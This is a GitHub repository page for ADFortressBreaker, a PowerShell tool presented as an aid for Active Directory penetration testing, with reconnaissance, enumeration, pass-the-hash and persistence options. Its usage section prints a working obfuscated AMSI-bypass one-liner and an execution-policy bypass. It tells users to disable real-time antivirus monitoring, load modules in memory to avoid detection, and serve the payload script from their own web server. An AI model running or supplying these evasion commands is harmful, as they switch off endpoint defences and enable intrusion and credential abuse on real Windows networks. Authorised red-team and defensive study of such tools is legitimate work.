Skip to content
/ ADFortressBreaker Public

Powershell script that aims to simplify Penetration Testing operations in the Windows Active Directory environment. Designed and developed by @synackid and @m4rkh4ck

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

m4rkh4ck/ADFortressBreaker

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits
Modules
Modules
 
 
ADFortressBreaker.ps1
ADFortressBreaker.ps1
 
 
ADGolden.ps1
ADGolden.ps1
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

ADFortressBreaker

Default_fortress_breaker_logo_microsoft_windows_cybersecurity_1_b2db1a2f-aaee-41f3-85a0-d73527e5ce6e_0


About ADFortressBreaker

The script has been written to help Ethical Hackers to execute the most common command in a Penetration Test in an Active Directory environment without write any line of code. It's designed to leave as few traces as possible, so all the module will be loaded directly in memory to avoid defender interception. Remember that all the modules inside the Modules folder will activate your antivirus, so before use it you have to disable real time monitoring or give an exclusion to the path where you will use it.

Usage

Before launching AdFortressBreaker it is necessary to bypass powershell execution policy:

powershell -ep bypass

Then you have to bypass the AMSI control:

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Import the module:

. .\ADFortressBreaker.ps1

Execute:

Invoke-ADFortressBreaker

After that the user have to start a web server on port 8000 on his machine.

           _____  ______         _                     ____                 _
     /\   |  __ \|  ____|       | |                   |  _ \               | |
    /  \  | |  | | |__ ___  _ __| |_ _ __ ___  ___ ___| |_) |_ __ ___  __ _| | _____ _ __
   / /\ \ | |  | |  __/ _ \| '__| __| '__/ _ \/ __/ __|  _ <| '__/ _ \/ _ | |/ / _ \ '__|
  / ____ \| |__| | | | (_) | |  | |_| | |  __/\__ \__ \ |_) | | |  __/ (_| |   <  __/ |
 /_/    \_\_____/|_|  \___/|_|   \__|_|  \___||___/___/____/|_|  \___|\__,_|_|\_\___|_|


1) Reconnaissance
2) Enumeration
3) PassTheHash
4) Persistence
5) Exit


[*] Start a web server on your machine (exposed on port 8000) to download the .ps1 file

[*} Example: python3 -m http.server

[*] Set the web server ip address :

In the main menu the user can choose the activity to do by typing the corresponding number and pressing enter.

Credits

To implement ADFortressBreaker we used the following tools:

License

This project is under the Commons Clause version of the MIT License license. You can copy, modify, distribute and perform the work for whatever reason, excluding commercial purposes.

About

Powershell script that aims to simplify Penetration Testing operations in the Windows Active Directory environment. Designed and developed by @synackid and @m4rkh4ck

Topics

active-directory cybersecurity redteaming penetration-testing-tools

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages